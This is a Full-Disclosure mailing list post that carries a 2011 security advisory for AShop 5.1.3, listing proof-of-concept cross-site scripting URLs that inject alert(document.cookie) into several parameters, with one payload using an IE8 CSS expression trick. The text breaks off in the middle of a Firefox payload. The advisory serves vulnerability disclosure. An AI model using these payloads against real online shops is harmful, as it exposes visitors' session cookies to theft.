3fSFmFIHQRWT2vx3gEEi6PgI3rquQWKgS2RMLdBGigTJX5Sq2vD9RjT26enpRl4V
NO9BEBVm9/zdebCQ4ahfPrv+M9IZGxak6sQ+SB+mMaoukSFz8cqWsA==
=VEn4
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Multiple security vulnerabilities in AShop 5.1.3

[Schurtz, Stefan]

Advisory:   Multiple security vulnerabilities in AShop 5.1.3
Advisory ID:INFOSERVE-ADV2011-02
Author: Stefan Schurtz
Contact:secur...@infoserve.de
Affected Software:  Successfully tested on AShop513
Vendor URL: http://www.ashopsoftware.com/
Vendor Status:  fixed in Version 5.1.4

==
Vulnerability Description:
==

AShop is prone to multiple security vulnerabilities. 

==
PoC-Exploit
==

Cross-Site-Scripting

IE8

http:///ashop/?'"alert(document.cookie)
http:///ashop/index.php?'"alert(document.cookie)
http:///ashop/picture.php?picture="
stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http:///ashop/index.php?language='"alert(document.cookie)

FF 7.1

http:///ashop/index.php?searchstring=1&showresult=true&exp='"